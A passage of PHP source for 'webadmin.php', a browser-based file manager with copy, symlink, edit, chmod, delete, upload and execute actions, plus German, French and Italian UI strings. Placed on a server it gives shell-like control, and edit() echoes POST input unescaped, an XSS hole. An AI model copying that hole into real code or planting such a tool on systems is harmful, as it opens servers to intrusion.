				if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
					$success[] = $file;
				} else {
					$failure[] = $file;
				}
			}

			$message = '';
			if (sizeof($failure) > 0) {
				$message = error('not_copied', implode("\n", $failure), $dest);
			}
			if (sizeof($success) > 0) {
				$message .= notice('copied', implode("\n", $success), $dest);
			}

			listing_page($message);

		} else {

			if (!@file_exists($dest) && @copy($file, $dest)) {
				listing_page(notice('copied', $file, $dest));
			} else {
				listing_page(error('not_copied', $file, $dest));
			}

		}

	} else {

		html_header();

		echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
';

		request_dump();

		echo "\n<b>" . word('copy_files') . '</b>
	<p>
';

		foreach ($files as $file) {
			echo "\t" . html($file) . "<br />\n";
		}

		echo '	</p>
	<hr />
	' . word('destination') . ':
	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
	<input type="submit" value="' . word('copy') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

		html_footer();

	}

	break;

case 'create_symlink':

	if (!empty($_POST['destination'])) {

		$dest = relative2absolute($_POST['destination'], $directory);

		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);

		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);

		if (!@file_exists($dest) && @symlink($file, $dest)) {
			listing_page(notice('symlinked', $file, $dest));
		} else {
			listing_page(error('not_symlinked', $file, $dest));
		}

	} else {

		html_header();

		echo '<form action="' . $self . '" method="post">

<table class="dialog" id="symlink">
<tr>
	<td style="vertical-align: top">' . word('destination') . ': </td>
	<td>
		<b>' . html($file) . '</b><br />
		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
		<label for="checkbox_relative">' . word('relative') . '</label>
		<input type="hidden" name="action" value="create_symlink" />
		<input type="hidden" name="file" value="' . html($file) . '" />
		<input type="hidden" name="dir" value="' . html($directory) . '" />
	</td>
</tr>
<tr>
	<td>' . word('symlink') . ': </td>
	<td>
		<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
		<input type="submit" value="' . word('create_symlink') . '" />
	</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

		html_footer();

	}

	break;

case 'edit':

	if (!empty($_POST['save'])) {

		$content = str_replace("\r\n", "\n", $_POST['content']);

		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
			listing_page(notice('saved', $file));
		} else {
			listing_page(error('not_saved', $file));
		}

	} else {

		if (@is_readable($file) && @is_writable($file)) {
			edit($file);
		} else {
			listing_page(error('not_edited', $file));
		}

	}

	break;

case 'permission':

	if (!empty($_POST['set'])) {

		$mode = 0;
		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;

		if (@chmod($file, $mode)) {
			listing_page(notice('permission_set', $file, decoct($mode)));
		} else {
			listing_page(error('permission_not_set', $file, decoct($mode)));
		}

	} else {

		html_header();

		$mode = fileperms($file);

		echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">

	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>

	<hr />

	<table id="permission">
	<tr>
		<td></td>
		<td style="border-right: 1px solid black">' . word('owner') . '</td>
		<td style="border-right: 1px solid black">' . word('group') . '</td>
		<td>' . word('other') . '</td>
	</tr>
	<tr>
		<td style="text-align: right">' . word('read') . ':</td>
		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
	</tr>
	<tr>
		<td style="text-align: right">' . word('write') . ':</td>
		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
	</tr>
	<tr>
		<td style="text-align: right">' . word('execute') . ':</td>
		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
	</tr>
	</table>

	<hr />

	<input type="submit" name="set" value="' . word('set') . '" />

	<input type="hidden" name="action" value="permission" />
	<input type="hidden" name="file" value="' . html($file) . '" />
	<input type="hidden" name="dir" value="' . html($directory) . '" />

</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

		html_footer();

	}

	break;

default:

	listing_page();

}

/* ------------------------------------------------------------------------- */

function getlist ($directory) {
	global $delim, $win;

	if ($d = @opendir($directory)) {

		while (($filename = @readdir($d)) !== false) {

			$path = $directory . $filename;

			if ($stat = @lstat($path)) {

				$file = array(
					'filename'    => $filename,
					'path'        => $path,
					'is_file'     => @is_file($path),
					'is_dir'      => @is_dir($path),
					'is_link'     => @is_link($path),
					'is_readable' => @is_readable($path),
					'is_writable' => @is_writable($path),
					'size'        => $stat['size'],
					'permission'  => $stat['mode'],
					'owner'       => $stat['uid'],
					'group'       => $stat['gid'],
					'mtime'       => @filemtime($path),
					'atime'       => @fileatime($path),
					'ctime'       => @filectime($path)
				);

				if ($file['is_dir']) {
					$file['is_executable'] = @file_exists($path . $delim . '.');
				} else {
					if (!$win) {
						$file['is_executable'] = @is_executable($path);
					} else {
						$file['is_executable'] = true;
					}
				}

				if ($file['is_link']) $file['target'] = @readlink($path);

				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));

				$files[] = $file;

			}

		}

		return $files;

	} else {
		return false;
	}

}

function sortlist ($list, $key, $reverse) {

	$dirs = array();
	$files = array();
	
	for ($i = 0; $i < sizeof($list); $i++) {
		if ($list[$i]['is_dir']) $dirs[] = $list[$i];
		else $files[] = $list[$i];
	}

	quicksort($dirs, 0, sizeof($dirs) - 1, $key);
	if ($reverse) $dirs = array_reverse($dirs);

	quicksort($files, 0, sizeof($files) - 1, $key);
	if ($reverse) $files = array_reverse($files);

	return array_merge($dirs, $files);

}

function quicksort (&$array, $first, $last, $key) {

	if ($first < $last) {

		$cmp = $array[floor(($first + $last) / 2)][$key];

		$l = $first;
		$r = $last;

		while ($l <= $r) {

			while ($array[$l][$key] < $cmp) $l++;
			while ($array[$r][$key] > $cmp) $r--;

			if ($l <= $r) {

				$tmp = $array[$l];
				$array[$l] = $array[$r];
				$array[$r] = $tmp;

				$l++;
				$r--;

			}

		}

		quicksort($array, $first, $r, $key);
		quicksort($array, $l, $last, $key);

	}

}

function permission_octal2string ($mode) {

	if (($mode & 0xC000) === 0xC000) {
		$type = 's';
	} elseif (($mode & 0xA000) === 0xA000) {
		$type = 'l';
	} elseif (($mode & 0x8000) === 0x8000) {
		$type = '-';
	} elseif (($mode & 0x6000) === 0x6000) {
		$type = 'b';
	} elseif (($mode & 0x4000) === 0x4000) {
		$type = 'd';
	} elseif (($mode & 0x2000) === 0x2000) {
		$type = 'c';
	} elseif (($mode & 0x1000) === 0x1000) {
		$type = 'p';
	} else {
		$type = '?';
	}

	$owner  = ($mode & 00400) ? 'r' : '-';
	$owner .= ($mode & 00200) ? 'w' : '-';
	if ($mode & 0x800) {
		$owner .= ($mode & 00100) ? 's' : 'S';
	} else {
		$owner .= ($mode & 00100) ? 'x' : '-';
	}

	$group  = ($mode & 00040) ? 'r' : '-';
	$group .= ($mode & 00020) ? 'w' : '-';
	if ($mode & 0x400) {
		$group .= ($mode & 00010) ? 's' : 'S';
	} else {
		$group .= ($mode & 00010) ? 'x' : '-';
	}

	$other  = ($mode & 00004) ? 'r' : '-';
	$other .= ($mode & 00002) ? 'w' : '-';
	if ($mode & 0x200) {
		$other .= ($mode & 00001) ? 't' : 'T';
	} else {
		$other .= ($mode & 00001) ? 'x' : '-';
	}

	return $type . $owner . $group . $other;

}

function is_script ($filename) {
	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
}

function getmimetype ($filename) {
	static $mimes = array(
		'\.jpg$|\.jpeg$'  => 'image/jpeg',
		'\.gif$'          => 'image/gif',
		'\.png$'          => 'image/png',
		'\.html$|\.html$' => 'text/html',
		'\.txt$|\.asc$'   => 'text/plain',
		'\.xml$|\.xsl$'   => 'application/xml',
		'\.pdf$'          => 'application/pdf'
	);

	foreach ($mimes as $regex => $mime) {
		if (eregi($regex, $filename)) return $mime;
	}

	// return 'application/octet-stream';
	return 'text/plain';

}

function del ($file) {
	global $delim;

	if (!file_exists($file)) return false;

	if (@is_dir($file) && !@is_link($file)) {

		$success = false;

		if (@rmdir($file)) {

			$success = true;

		} elseif ($dir = @opendir($file)) {

			$success = true;

			while (($f = readdir($dir)) !== false) {
				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
					$success = false;
				}
			}
			closedir($dir);

			if ($success) $success = @rmdir($file);

		}

		return $success;

	}

	return @unlink($file);

}

function addslash ($directory) {
	global $delim;

	if (substr($directory, -1, 1) != $delim) {
		return $directory . $delim;
	} else {
		return $directory;
	}

}

function relative2absolute ($string, $directory) {

	if (path_is_relative($string)) {
		return simplify_path(addslash($directory) . $string);
	} else {
		return simplify_path($string);
	}

}

function path_is_relative ($path) {
	global $win;

	if ($win) {
		return (substr($path, 1, 1) != ':');
	} else {
		return (substr($path, 0, 1) != '/');
	}

}

function absolute2relative ($directory, $target) {
	global $delim;

	$path = '';
	while ($directory != $target) {
		if ($directory == substr($target, 0, strlen($directory))) {
			$path .= substr($target, strlen($directory));
			break;
		} else {
			$path .= '..' . $delim;
			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
		}
	}
	if ($path == '') $path = '.';

	return $path;

}

function simplify_path ($path) {
	global $delim;

	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
		$path = realpath($path);
		if (@is_dir($path)) {
			return addslash($path);
		} else {
			return $path;
		}
	}

	$pattern  = $delim . '.' . $delim;

	if (@is_dir($path)) {
		$path = addslash($path);
	}

	while (strpos($path, $pattern) !== false) {
		$path = str_replace($pattern, $delim, $path);
	}

	$e = addslashes($delim);
	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;

	while (ereg($regex, $path)) {
		$path = ereg_replace($regex, $delim, $path);
	}
	
	return $path;

}

function human_filesize ($filesize) {

	$suffices = 'kMGTPE';

	$n = 0;
	while ($filesize >= 1000) {
		$filesize /= 1024;
		$n++;
	}

	$filesize = round($filesize, 3 - strpos($filesize, '.'));

	if (strpos($filesize, '.') !== false) {
		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
			$filesize = substr($filesize, 0, strlen($filesize) - 1);
		}
	}

	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));

	return $filesize . " {$suffix}B";

}

function strip (&$str) {
	$str = stripslashes($str);
}

/* ------------------------------------------------------------------------- */

function listing_page ($message = null) {
	global $self, $directory, $sort, $reverse;

	html_header();

	$list = getlist($directory);

	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;

	echo '<h1 style="margin-bottom: 0">webadmin.php</h1>

<form enctype="multipart/form-data" action="' . $self . '" method="post">

<table id="main">
';

	directory_choice();

	if (!empty($message)) {
		spacer();
		echo $message;
	}

	if (@is_writable($directory)) {
		upload_box();
		create_box();
	} else {
		spacer();
	}

	if ($list) {
		$list = sortlist($list, $sort, $reverse);
		listing($list);
	} else {
		echo error('not_readable', $directory);
	}

	echo '</table>

</form>

';

	html_footer();

}

function listing ($list) {
	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;

	echo '<tr class="listing">
	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
';

	column_title('filename', $sort, $reverse);
	column_title('size', $sort, $reverse);

	if (!$win) {
		column_title('permission', $sort, $reverse);
		column_title('owner', $sort, $reverse);
		column_title('group', $sort, $reverse);
	}

	echo '	<th class="functions">' . word('functions') . '</th>
</tr>
';

	for ($i = 0; $i < sizeof($list); $i++) {
		$file = $list[$i];

		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);

		echo '<tr class="listing">
	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
	<td class="filename" title="' . html($timestamps) . '">';

		if ($file['is_link']) {

			echo '<img src="' . $self . '?image=link" alt="link" /> ';
			echo html($file['filename']) . ' &rarr; ';

			$real_file = relative2absolute($file['target'], $directory);

			if (@is_readable($real_file)) {
				if (@is_dir($real_file)) {
					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
				} else {
					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
				}
			} else {
				echo html($file['target']);
			}

		} elseif ($file['is_dir']) {

			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
			if ($win || $file['is_executable']) {
				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
			} else {
				echo html($file['filename']);
			}
			echo ' ]';

		} else {

			if (substr($file['filename'], 0, 1) == '.') {
				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
			} else {
				echo '<img src="' . $self . '?image=file" alt="file" /> ';
			}

			if ($file['is_file'] && $file['is_readable']) {
			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
			} else {
				echo html($file['filename']);
			}

		}

		if ($file['size'] >= 1000) {
			$human = ' title="' . human_filesize($file['size']) . '"';
		} else {
			$human = '';
		}

		echo "</td>\n";

		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";

		if (!$win) {

			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';

			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
			echo html(permission_octal2string($file['permission']));
			if ($l) echo '</a>';

			echo "</td>\n";

			if (array_key_exists('owner_name', $file)) {
				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
			} else {
				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
			}

			if (array_key_exists('group_name', $file)) {
				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
			} else {
				echo "\t<td class=\"group\">{$file['group']}</td>\n";
			}

		}

		echo '	<td class="functions">
		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
';

		$actions = array();
		if (function_exists('symlink')) {
			$actions[] = 'create_symlink';
		}
		if (@is_writable(dirname($file['path']))) {
			$actions[] = 'delete';
			$actions[] = 'rename';
			$actions[] = 'move';
		}
		if ($file['is_file'] && $file['is_readable']) {
			$actions[] = 'copy';
			$actions[] = 'download';
			if ($file['is_writable']) $actions[] = 'edit';
		}
		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
			$actions[] = 'execute';
		}

		if (sizeof($actions) > 0) {

			echo '		<select class="small" name="action' . $i . '" size="1">
		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
';

			foreach ($actions as $action) {
				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
			}

			echo '		</select>
		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
';

		}

		echo '	</td>
</tr>
';

	}

	echo '<tr class="listing_footer">
	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
	<td colspan="' . ($cols - 1) . '">
		<input type="hidden" name="num" value="' . sizeof($list) . '" />
		<input type="hidden" name="focus" value="" />
		<input type="hidden" name="olddir" value="' . html($directory) . '" />
';

	$actions = array();
	if (@is_writable(dirname($file['path']))) {
		$actions[] = 'delete';
		$actions[] = 'move';
	}
	$actions[] = 'copy';

	echo '		<select class="small" name="action_all" size="1">
		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
';

	foreach ($actions as $action) {
		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
	}

	echo '		</select>
		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
	</td>
</tr>
';

}

function column_title ($column, $sort, $reverse) {
	global $self, $directory;

	$d = 'dir=' . urlencode($directory) . '&amp;';

	$arr = '';
	if ($sort == $column) {
		if (!$reverse) {
			$r = '&amp;reverse=true';
			$arr = ' &and;';
		} else {
			$arr = ' &or;';
		}
	} else {
		$r = '';
	}
	echo "\t<th class=\"$column\"><a href=\"$self?{$d}sort=$column$r\">" . word($column) . "</a>$arr</th>\n";

}

function directory_choice () {
	global $directory, $homedir, $cols, $self;

	echo '<tr>
	<td colspan="' . $cols . '" id="directory">
		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
	</td>
</tr>
';

}

function upload_box () {
	global $cols;

	echo '<tr>
	<td colspan="' . $cols . '" id="upload">
		' . word('file') . ':
		<input type="file" name="upload" onfocus="activate(\'other\')" />
		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
	</td>
</tr>
';

}

function create_box () {
	global $cols;

	echo '<tr>
	<td colspan="' . $cols . '" id="create">
		<select name="create_type" size="1" onfocus="activate(\'create\')">
		<option value="file">' . word('file') . '</option>
		<option value="directory">' . word('directory') . '</option>
		</select>
		<input type="text" name="create_name" onfocus="activate(\'create\')" />
		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
	</td>
</tr>
';

}

function edit ($file) {
	global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;

	html_header();

	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>

<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">

	<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';

	if (array_key_exists('content', $_POST)) {
		echo $_POST['content'];
	} else {
		$f = fopen($file, 'r');
		while (!feof($f)) {
			echo html(fread($f, 8192));
		}
		fclose($f);
	}

	if (!empty($_POST['user'])) {
		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
	}
	if (!empty($_POST['basic_auth'])) {
		if ($win) {
			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
		} else {
			$authfile = $directory . $htpasswd;
		}
		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
		echo 'Require valid-user';
	}

	echo '</textarea>

	<hr />
';

	if ($apache && basename($file) == $htpasswd) {
		echo '
	' . word('user') . ': <input type="text" name="user" />
	' . word('password') . ': <input type="password" name="password" />
	<input type="submit" value="' . word('add') . '" />

	<hr />
';

	}

	if ($apache && basename($file) == $htaccess) {
		echo '
	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />

	<hr />
';

	}

	echo '
	<input type="hidden" name="action" value="edit" />
	<input type="hidden" name="file" value="' . html($file) . '" />
	<input type="hidden" name="dir" value="' . html($directory) . '" />
	<input type="reset" value="' . word('reset') . '" id="red_button" />
	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />

</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

';

	html_footer();

}

function spacer () {
	global $cols;

	echo '<tr>
	<td colspan="' . $cols . '" style="height: 1em"></td>
</tr>
';

}

function textfieldsize ($content) {

	$size = strlen($content) + 5;
	if ($size < 30) $size = 30;

	return $size;

}

function request_dump () {

	foreach ($_REQUEST as $key => $value) {
		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
	}

}

/* ------------------------------------------------------------------------- */

function html ($string) {
	global $site_charset;
	return htmlentities($string, ENT_COMPAT, $site_charset);
}

function word ($word) {
	global $words, $word_charset;
	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
}

function phrase ($phrase, $arguments) {
	global $words;
	static $search;

	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";

	for ($i = 0; $i < sizeof($arguments); $i++) {
		$arguments[$i] = nl2br(html($arguments[$i]));
	}

	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');

	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));

}

function getwords ($lang) {
	global $date_format, $word_charset;
	$word_charset = 'UTF-8';

	switch ($lang) {
	case 'de':

		$date_format = 'd.m.y H:i:s';

		return array(
'directory' => 'Verzeichnis',
'file' => 'Datei',
'filename' => 'Dateiname',

'size' => 'Größe',
'permission' => 'Rechte',
'owner' => 'Eigner',
'group' => 'Gruppe',
'other' => 'Andere',
'functions' => 'Funktionen',

'read' => 'lesen',
'write' => 'schreiben',
'execute' => 'ausführen',

'create_symlink' => 'Symlink erstellen',
'delete' => 'löschen',
'rename' => 'umbenennen',
'move' => 'verschieben',
'copy' => 'kopieren',
'edit' => 'editieren',
'download' => 'herunterladen',
'upload' => 'hochladen',
'create' => 'erstellen',
'change' => 'wechseln',
'save' => 'speichern',
'set' => 'setze',
'reset' => 'zurücksetzen',
'relative' => 'Pfad zum Ziel relativ',

'yes' => 'Ja',
'no' => 'Nein',
'back' => 'zurück',
'destination' => 'Ziel',
'symlink' => 'Symbolischer Link',
'no_output' => 'keine Ausgabe',

'user' => 'Benutzername',
'password' => 'Kennwort',
'add' => 'hinzufügen',
'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',

'uploaded' => '"[%1]" wurde hochgeladen.',
'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
'already_exists' => '"[%1]" existiert bereits.',
'created' => '"[%1]" wurde erstellt.',
'not_created' => '"[%1]" konnte nicht erstellt werden.',
'really_delete' => 'Sollen folgende Dateien wirklich gelöscht werden?',
'deleted' => "Folgende Dateien wurden gelöscht:\n[%1]",
'not_deleted' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
'rename_file' => 'Benenne Datei um:',
'renamed' => '"[%1]" wurde in "[%2]" umbenannt.',
'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
'move_files' => 'Verschieben folgende Dateien:',
'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
'copy_files' => 'Kopiere folgende Dateien:',
'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
'not_edited' => '"[%1]" kann nicht editiert werden.',
'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
'saved' => '"[%1]" wurde gespeichert.',
'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
'permission_for' => 'Rechte für "[%1]":',
'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
'not_readable' => '"[%1]" kann nicht gelesen werden.'
		);

	case 'fr':

		$date_format = 'd.m.y H:i:s';

		return array(
'directory' => 'Répertoire',
'file' => 'Fichier',
'filename' => 'Nom fichier',

'size' => 'Taille',
'permission' => 'Droits',
'owner' => 'Propriétaire',
'group' => 'Groupe',
'other' => 'Autres',
'functions' => 'Fonctions',

'read' => 'Lire',
'write' => 'Ecrire',
'execute' => 'Exécuter',

'create_symlink' => 'Créer lien symbolique',
'delete' => 'Effacer',
'rename' => 'Renommer',
'move' => 'Déplacer',
'copy' => 'Copier',
'edit' => 'Ouvrir',
'download' => 'Télécharger sur PC',
'upload' => 'Télécharger sur serveur',
'create' => 'Créer',
'change' => 'Changer',
'save' => 'Sauvegarder',
'set' => 'Exécuter',
'reset' => 'Réinitialiser',
'relative' => 'Relatif',

'yes' => 'Oui',
'no' => 'Non',
'back' => 'Retour',
'destination' => 'Destination',
'symlink' => 'Lien symbollique',
'no_output' => 'Pas de sortie',

'user' => 'Utilisateur',
'password' => 'Mot de passe',
'add' => 'Ajouter',
'add_basic_auth' => 'add basic-authentification',

'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
'already_exists' => '"[%1]" existe déjà.',
'created' => '"[%1]" a été créé.',
'not_created' => '"[%1]" n a pas pu être créé.',
'really_delete' => 'Effacer le fichier?',
'deleted' => "Ces fichiers ont été détuits:\n[%1]",
'not_deleted' => "Ces fichiers n ont pu être détruits:\n[%1]",
'rename_file' => 'Renomme fichier:',
'renamed' => '"[%1]" a été renommé en "[%2]".',
'not_renamed' => '"[%1] n a pas pu être renommé en "[%2]".',
'move_files' => 'Déplacer ces fichiers:',
'moved' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
'not_moved' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
'copy_files' => 'Copier ces fichiers:',
'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" ne peut être ouvert.',
'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
'saved' => '"[%1]" a été sauvegardé.',
'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
'permission_for' => 'Droits de "[%1]":',
'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
'not_readable' => '"[%1]" ne peut pas être ouvert.'
		);

	case 'it':

		$date_format = 'd-m-Y H:i:s';

		return array(
'directory' => 'Directory',
'file' => 'File',
'filename' => 'Nome File',

'size' => 'Dimensioni',
'permission' => 'Permessi',
'owner' => 'Proprietario',
'group' => 'Gruppo',
'other' => 'Altro',
'functions' => 'Funzioni',

'read' => 'leggi',
'write' => 'scrivi',
'execute' => 'esegui',

'create_symlink' => 'crea link simbolico',
'delete' => 'cancella',
'rename' => 'rinomina',
'move' => 'sposta',
'copy' => 'copia',
'edit' => 'modifica',
'download' => 'download',
'upload' => 'upload',
'create' => 'crea',
'change' => 'cambia',
'save' => 'salva',
'set' => 'imposta',
'reset' => 'reimposta',
'relative' => 'Percorso relativo per la destinazione',

'yes' => 'Si',
'no' => 'No',
'back' => 'indietro',
'destination' => 'Destinazione',
'symlink' => 'Link simbolico',
'no_output' => 'no output',

'user' => 'User',
'password' => 'Password',
'add' => 'aggiungi',
'add_basic_auth' => 'aggiungi autenticazione base',

'uploaded' => '"[%1]" è stato caricato.',
'not_uploaded' => '"[%1]" non è stato caricato.',
'already_exists' => '"[%1]" esiste già.',
'created' => '"[%1]" è stato creato.',
'not_created' => '"[%1]" non è stato creato.',
'really_delete' => 'Cancello questi file ?',
'deleted' => "Questi file sono stati cancellati:\n[%1]",
'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
'rename_file' => 'File rinominato:',
'renamed' => '"[%1]" è stato rinominato in "[%2]".',
'not_renamed' => '"[%1] non è stato rinominato in "[%2]".',
'move_files' => 'Sposto questi file:',
'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
'copy_files' => 'Copio questi file',
'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
'not_edited' => '"[%1]" non può essere modificato.',
'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
